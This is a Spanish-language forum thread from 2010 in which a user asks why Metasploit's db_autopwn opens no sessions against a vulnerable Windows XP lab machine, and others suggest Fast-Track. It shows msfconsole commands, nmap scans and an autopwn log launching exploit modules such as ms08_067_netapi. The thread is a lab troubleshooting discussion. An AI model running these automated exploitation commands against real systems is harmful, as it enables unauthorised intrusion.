Hola tengo una duda, he investigado sobre el comando db_autopwn de metasploit framework 3.3 y parece que corre pero no me crea sesiones, en cambio lo ago manualmente (exploto con el simple windows/smb/ms08_067_netapi) y funciona a la perfección.
mis pasos son:
1-creo la base de datos en sqlite3
2-luego con db_nmap -n -sL -PN 192.168.1.5 en este caso una maquina virtual windows XP vulnerable al exploit windows/smb/ms08_067_netapi
3-db_ autopwn -t -p -e tambien e probado la opcion -r para que sea una conexion reverse.
vale ahora empieza a comprobar y tal pero no me crea session meterpretetr incluso cuando comprueba con el exploit vulnerable el cual es visible en la consola.
se les ocurre algo que e hecho mal? si lo necesitan os enviaré screenshots que ahora estoy en clase y no tengo tiempo :P
gracias de antemano.
Si usas Backtrack, desde la consola teclea:
cd /pentest/exploits/fasttrack
sudo ./fast-track.py -g
Ingresas a http://127.0.0.1:44444 desde el navegador.
y en la barra izquierda busca Autopwn Automation, ahí pones la IP y le das en Metasploit Autopwn y lo hace todo automático...
salu2
Emmm danos más especificaciones, tales como, es una IP Publica o Privada?, en caso tal de que sea privada, estás en red con ese equipo?.
Muestranos que resultado te genera el Nmap. Así:
root@bt:~# nmap [host-name || direccion-ip]
Si estoy conectado a una red privada lo daba por sabido lo siento, también me conecto con wifi(wlan0) aqui tienes mi nmap:
dazoverride@xxx:~$ sudo nmap -sP 192.168.2.0/24
[sudo] password for dazoverride:
Starting Nmap 5.21 ( http://nmap.org ) at 2010-04-23 22:09 CEST
Nmap scan report for 192.168.2.1 --> router
Host is up (0.0021s latency).
Nmap scan report for 192.168.2.2 --> pc de sobremesa ubuntu
Host is up (0.0042s latency).
Nmap scan report for 192.168.2.4 -->pc_atacante(ubuntu)
Host is up.
Nmap scan report for 192.168.2.5 --> pc_victima(windows_xp con vulnerabilidad windows/smb/ms08_067_netapi
Host is up (0.00057s latency).
como e dicho antes ahora lo que haria es abrir el msfconsole y:
msf > db_create prueba
[*] Creating a new database instance...
[*] Successfully connected to the database
[*] File: prueba
msf > db_connect prueba
[*] Successfully connected to the database
[*] File: prueba
msf > db_nmap -n -sT -PN 192.168.2.5
Starting Nmap 5.21 ( http://nmap.org ) at 2010-04-23 22:21 CEST
Nmap scan report for 192.168.2.5
Host is up (0.010s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-term-serv
31337/tcp open Elite
Nmap done: 1 IP address (1 host up) scanned in 1.32 seconds
msf > db_autopwn -t -p -e
[*] Analysis completed in 6 seconds (0 vulns / 0 refs)
[*]
[*] ===============================================================
[*] Matching Exploit Modules
[*] ===============================================================
[*] 192.168.2.5:139 exploit/windows/smb/ms08_067_netapi (port match)
(he quitado los demás para ahorrar espacio)
===============================================================
[*]
[*]
[*] (1/43 [0 sessions]): Launching exploit/windows/dcerpc/ms03_026_dcom against 192.168.2.5:135...
[*] (2/43 [0 sessions]): Launching exploit/linux/samba/lsa_transnames_heap against 192.168.2.5:139...
.........
[*] (18/43 [0 sessions]): Launching exploit/windows/smb/ms08_067_netapi against 192.168.2.5:139...
.........
[*] (42/43 [0 sessions]): Launching exploit/windows/smb/psexec against 192.168.2.5:445...
[*] (43/43 [0 sessions]): Launching exploit/windows/smb/timbuktu_plughntcommand_bof against 192.168.2.5:445...
[*] (43/43 [0 sessions]): Waiting on 15 launched modules to finish execution...
[*] (43/43 [0 sessions]): Waiting on 0 launched modules to finish execution...
[*] The autopwn command has completed with 0 sessions
de todas formas lo que mas me sorprende es que me entre al pc victima cuando lo exploto manualmente con el exploit windows/smb/ms08_067_netapi y luego cuando utilizo el db_autopwn vea pasar el exploit como si estuviera intentando explotar el servicio y las sessions siguen a 0. Ademas tambien he probado lo de importar el scan del nessus correctamente incluso veia las vulnerabilidades con el comando db_vulns del metasploit y ejecute la opcion -x del db_autopwn y nada....
Por cierto lo del fast-track enseguida lo pruebo y os informo.
Como ya han comentado, lo interesante para estos ataques tan lammers (eee que a mi tambien me gustan), es usar Fast-track, pues este lo configura todo y te aseguras del correcto funcionamiento de la rutina.
Añado de paso, que es posible que no hayas identificado bien al host, o que haya algun argumento erroneo en el comando autopwn.
Saludos
vaya con el fast-track me vais a convencer para probarlo, coincido contigo es una tecnica lammer yo tambien prefiero hacerlo manualmente pero si no funciona manualmente pues como segunda opcion es perfecta bueno voy a arrancar el backtrack y a probar el fast-track gracias a todos de todas formas si alguien tiene una solucion para el tema principal que me lo haga saber please
Cita de: dazoverride en 23 Abril 2010, 22:47 PM
vaya con el fast-track me vais a convencer para probarlo, coincido contigo es una tecnica lammer yo tambien prefiero hacerlo manualmente pero si no funciona manualmente pues como segunda opcion es perfecta bueno voy a arrancar el backtrack y a probar el fast-track gracias a todos de todas formas si alguien tiene una solucion para el tema principal que me lo haga saber please
El gustillo de encontrar la vulnerabilidad por tu mano y como si de una metralleta P90 se tratase bombardeando el sistema con exploits, no tiene precio, pero claro esta que el autopwn te peude servir para determinar si tienes que irte lejos para entrar o con metasploit mismo puedes hacerlo.
Saludos
bendito fast-track XD teniais razon, me funciona y es una lammerada XD
parece que el fallo era el ubuntu, con el backtrack me funciona el db_autopwn haciendo los mismo pasos que con el ubuntu....
bueno ya me lo mirare, algo tendré mal en el ubuntu.. por mi el tema queda cerrado :D
gracias a todos gran trabajo :D :D
Cita de: dazoverride en 23 Abril 2010, 23:03 PM
bendito fast-track XD teniais razon, me funciona y es una lammerada XD
parece que el fallo era el ubuntu, con el backtrack me funciona el db_autopwn haciendo los mismo pasos que con el ubuntu....
bueno ya me lo mirare, algo tendré mal en el ubuntu.. por mi el tema queda cerrado :D
gracias a todos gran trabajo :D :D
Se bueno ;)
Saludos
personalmente a mi no me gusta el db_autopwn... es como si fuera una pistola en las manos de un mono que aprendio a manipularla pero no tiene sentido comun. muchas de las personas que utilizan el Metasploit se podria decir que no saben como funcionan las vulnerabilidades, simplemente la usan y listo...
Cita de: Lord R.N.A. en 24 Abril 2010, 20:42 PM
personalmente a mi no me gusta el db_autopwn... es como si fuera una pistola en las manos de un mono que aprendio a manipularla pero no tiene sentido comun. muchas de las personas que utilizan el Metasploit se podria decir que no saben como funcionan las vulnerabilidades, simplemente la usan y listo...
Es importante decir que ante un host real tiene pocas probabilidades de exito, para estos es mejor ingenieria social o es muy dificil encontrar algun servicio vulnerable.
Saludos
estoy deacuerdo con los dos el autopwn es un poco lammer y ademas tambien prefiero hacerlo manualmente, y es cierto, un pc real no suele tener muchas vulnerabilidades, como muxo la del ms08_067_netapi pero bueno siempre va bien saberlo.
los ataques que mas me gustan con metasploit son sumandole el ettercap, ahi es cuando empieza a ser peligroso el metasploit, de momento no se hacer muxo mas, espero aprender mas sobre el metrasploit.
saludos!
Cita de: dazoverride en 25 Abril 2010, 17:04 PM
estoy deacuerdo con los dos el autopwn es un poco lammer y ademas tambien prefiero hacerlo manualmente, y es cierto, un pc real no suele tener muchas vulnerabilidades, como muxo la del ms08_067_netapi pero bueno siempre va bien saberlo.
los ataques que mas me gustan con metasploit son sumandole el ettercap, ahi es cuando empieza a ser peligroso el metasploit, de momento no se hacer muxo mas, espero aprender mas sobre el metrasploit.
saludos!
Si lees bien vez que no me gusta y expreso las razones por lo tanto no creo que este en el grupo de los 2 con los que estas en desacuerdo